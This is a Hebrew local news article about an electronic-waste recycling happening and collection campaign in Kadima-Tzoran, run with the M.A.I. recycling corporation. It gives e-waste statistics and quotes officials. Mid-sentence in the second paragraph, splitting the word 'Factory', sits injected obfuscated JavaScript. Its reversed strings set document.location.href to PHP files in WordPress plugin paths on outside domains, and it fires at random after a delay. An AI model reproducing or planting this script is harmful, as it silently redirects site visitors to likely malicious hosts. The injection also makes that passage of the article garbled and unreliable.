fbpx
[shortcode-weather-atlas city_selector=1178240 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הפנינג יצירתי בקדימה צורן. מחזור פסולת אלקטרונית

המפעל למחזור פסולת אלקטרונית מ.א.י Fac$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory "ינחת" בקדימה צורן ב-30-31 למרץ.
מחזור פסולת אלקטרונית. צילום מאי

מועצה מקומית קדימה צורן ותאגיד מ.א.י למיחזור פסולת אלקטרונית מובילים לשינוי חברתי-סביבתי ביחס לפסולת אלקטרונית. בחג הפסח יוצאת המועצה בקמפיין הסברה ואיסוף של פסולת אלקטרונית וחשמלית למיחזור. כאשר המוטו הוא: "לא פוסחים על אף מכשיר חשמל״. זה כולל שילוט חוצות, הסברה במערכת החינוך והפנינג איסוף והסברה חגיגי לכל המשפחה, שיתקיים בחול המועד פסח במשך יומיים.

המפעל למחזור פסולת אלקטרונית מ.א.י Factory "ינחת" בקדימה צורן ב-30-31 למרץ. יקיים פעילות פופ אפ מהנה עבור המשפחות והמבקרים. האירוע יתקיים בהמשך לפעילות החינוכית שנעשתה בגני הילדים ובתי הספר. בנושא מיחזור פסולת אלקטרונית וסוללות. במסגרתה הילדים למדו על חשיבות מיחזור הפסולת האלקטרונית. ופעלו לאיסוף הפסולת, תוך שהם עוברים תהליך חינוכי ערכי. וגם מבצעים אותו בפועל. התלמידים אספו סוללות ישנות, טלפונים סלולריים ישנים.  ושאר מכשירים אלקטרונים קטנים שכבר אין בהם שימוש. אותם יביאו ל"מפעל המיחזור" הנייד שינחת בקדימה צורן.

בקדימה צורן כבר אוספים פסולת אלקטרונית

ברחבי קדימה צורן מוצבים דרך קבע מתקנים לאיסוף פסולת אלקטרונית. מיקומי נקודות האיסוף וכן מידע מפורט בנושא ניתן למצוא באתר המועצה ובאתר תאגיד מ.א.י

בכל שנה מייצרים אזרחי ישראל כ-160,000,000 ק"ג של פסולת אלקטרונית. וכך, למרות שהפסולת האלקטרונית הינה רק כ-3% מכלל הפסולת. בפועל היא מהווה כ-70% מתכולתה הרעילה, המזיקה מאוד לבריאות התושבים. כאשר כל תושב בארץ מייצר כ-17 ק"ג פסולת אלקטרונית בכל שנה. היא עשויה מחומרים מזהמים ביותר כגון עופרת וכספית. שעלולים לגרום למחלות במערכות העצבים והנשימה. כיום, מרבית הפסולת עדיין אינה מגיעה למיחזור. בישראל נשרפת כמות עצומה של פסולת אלקטרונית רעילה, המזהמת את האדמה, את מקורות המים וגם את האוויר, ופוגעת כאמור בבריאות התושבים.

קרן גרין, ראש מועצת קדימה-צורן:  "כקהילה, חרתנו על דגלנו את נושא איכות הסביבה והקיימות, ואני מברכת על שיתוף הפעולה המצוין עם תאגיד מ.א.י. כצעד נוסף במכלול הנושאים שהמועצה מקדמת. אנו רואים את העוצמה שבחינוך ובשותפות עם הקהילה, ומזמינים את כולכם לקחת חלק בהפנינג הייחודי.

אמנון שחרור ודן הלמן, מנכ"לים משותפים בתאגיד מ.א.י למיחזור פסולת אלקטרונית: "תלמידי ישראל של היום הם דור העתיד. בשביל איכות החיים שלהם, מוטלת על כולנו החובה למחזר ולשמור על כדור הארץ. בזכות ההיענות של תושבי קדימה-צורן, מוחזרו עד היום טונות רבים של פסולת אלקטרונית, ואנו קוראים לתושבים להמשיך ולהוביל במיחזור ולשמור על הסביבה".

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות